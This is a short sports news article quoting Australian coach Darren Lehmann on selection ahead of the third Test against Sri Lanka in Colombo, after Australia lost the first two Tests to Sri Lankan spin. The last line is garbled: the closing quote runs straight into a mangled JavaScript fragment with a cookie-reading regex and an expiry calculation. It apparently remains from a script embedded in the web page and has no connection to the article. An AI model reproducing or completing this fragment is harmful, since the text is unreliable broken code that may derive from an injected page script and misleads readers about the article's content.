Australian coach Darren Lehmann has put every player on notice ahead of the third Test against Sri Lanka in Colombo on Saturday.

Australia has already lost the series after two disastrous losses in the opening two Tests, and Lehmann said every position will be reviewed.

"Well anywhere from one to six (in the batting order), everyone in the squad will be considered," Lehmann said.

"That’s what happens when you don’t have the results you would like.

"We will need to have a look at the wicket, sum it up and go from there.

"One of the pleasing things is we’ve managed to get 20 wickets in every game, but we just need to get more runs.

"All those things to weigh up, selection is going to be tough and tight for this one.

"You don’t like dropping anyone, you feel for them when they don’t play as well as they would like.

"That’s the hardest thing as a coach and a selector, you have to make tough decisions sometimes."

The Aussies have managed scores of just 106, 183, 203 and 161 in their four innings to date.

Spin has once again proven to be Australia's downfall in the series thus far, with Rangana Herath and Dilruwan Perera taking 26 of the 40 Australian wickets to fall. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
